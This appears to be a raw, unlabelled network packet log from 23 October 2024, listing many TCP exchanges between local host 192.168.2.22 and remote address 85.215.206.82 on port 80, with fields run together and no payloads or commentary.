                                                                                                                                                                        Oct 23, 2024 17:26:32.750499964 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.750519037 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.750554085 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.750560045 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.750591040 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.750592947 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.750627041 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.750631094 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.750669003 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.751281977 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.751334906 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.751375914 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.751410961 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.751435041 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.751449108 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.751450062 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.751486063 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.771781921 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.771825075 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.771881104 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.771915913 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.771953106 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.771967888 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.772025108 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.772025108 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.867305994 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.867326975 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.867341042 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.867397070 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.867410898 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.867424011 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.867454052 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.867917061 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.867978096 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.868024111 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.868092060 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.868143082 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.868231058 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.868277073 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.868449926 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.868495941 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.868504047 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.868545055 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.889142036 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.889170885 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.889182091 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.889194012 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.889276028 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.889286995 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.889374971 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.889782906 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.889806032 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.889847040 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.889847994 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.984689951 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.984750032 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.984791994 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.984803915 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.984817028 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.984832048 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.984838009 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.984846115 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.984847069 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.984869003 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.984879971 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.985141039 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.985196114 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.985517979 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.985538960 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.985552073 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:32.985565901 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:32.985577106 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.006411076 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.006452084 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.006489038 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.006493092 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.006505013 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.006525993 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.006527901 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.006571054 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.006588936 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.006623983 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.006635904 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.006665945 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.051470041 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.051492929 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.051533937 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.051564932 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.102025986 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.102044106 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.102058887 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.102077961 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.102094889 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.102099895 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.102123976 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.102135897 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.102160931 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.102169037 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.102319956 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.102346897 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.102359056 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.102359056 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.102381945 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.102391005 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.102478027 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.102519989 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.123533964 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.123594046 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.123605013 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.123613119 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.123644114 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.123644114 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.123707056 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.123740911 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.123847008 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.123888969 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.123914957 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.123955011 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.124017000 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.124061108 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.211623907 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.211679935 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.211694002 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.211766005 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.211803913 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.219168901 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.219227076 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.219245911 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.219264030 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.219269991 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.219327927 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.219413042 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.219455957 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.219490051 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.219511986 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.219621897 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.219659090 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.219672918 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.219700098 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.219702959 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.219734907 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.219747066 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.219779968 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.240638971 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.240696907 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.240731955 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.240731955 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.240828991 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.240884066 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.240894079 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.240930080 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.240947962 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.240971088 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.241537094 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.241586924 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.241619110 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.241631031 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.328522921 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.328571081 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.328608990 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.328654051 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.328675032 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:33.336178064 CEST804916985.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:33.336239100 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:34.529752970 CEST4916980192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:44.710062027 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:44.717293978 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:44.717353106 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:44.717466116 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:44.724253893 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.588454962 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.588469982 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.588481903 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.588493109 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.588505030 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.588535070 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.588552952 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.588566065 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.588571072 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.588577986 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.588589907 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.588601112 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.588613033 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.588628054 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.589618921 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.594075918 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.594089031 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.594103098 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.594166994 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.595451117 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.599512100 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.727186918 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.727255106 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.727267981 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.727281094 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.727310896 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.727514982 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.727526903 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.727540016 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.727543116 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.727566957 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.727581978 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.727598906 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.727632999 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.728156090 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.728168964 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.728182077 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.728193998 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.728210926 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.728224039 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.728394985 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.728431940 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.729125977 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.729162931 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.756911039 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.845959902 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.845973969 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.845985889 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.846198082 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.846524954 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.846537113 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.846549034 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.846561909 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.846575022 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.846585989 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.846601963 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.846645117 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.847457886 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.847470045 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.847512960 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.866030931 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.866044044 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.866055012 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.866117954 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.867446899 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.871596098 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.961993933 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.962018013 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.962030888 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.962043047 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.962044954 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.962054968 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.962066889 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.962066889 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.962069988 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.962089062 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.962105036 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.962140083 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.962151051 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.962173939 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.962186098 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.983031034 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.983043909 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.983057022 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.983078957 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.983110905 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.983596087 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.983608007 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.983637094 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.984854937 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:45.985470057 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.985480070 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:45.985524893 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:46.078674078 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.078692913 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.078706980 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.078727961 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:46.078742981 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:46.079020023 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.079030991 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.079045057 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.079057932 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:46.079082012 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:46.079091072 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.079102039 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.079125881 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:46.100327015 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.100341082 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.100353003 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.100395918 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:46.100410938 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:46.101248026 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.101259947 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.101269960 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.101291895 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:46.101306915 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:46.143363953 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.143377066 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.143389940 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.143438101 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:46.143470049 CEST4917080192.168.2.2285.215.206.82
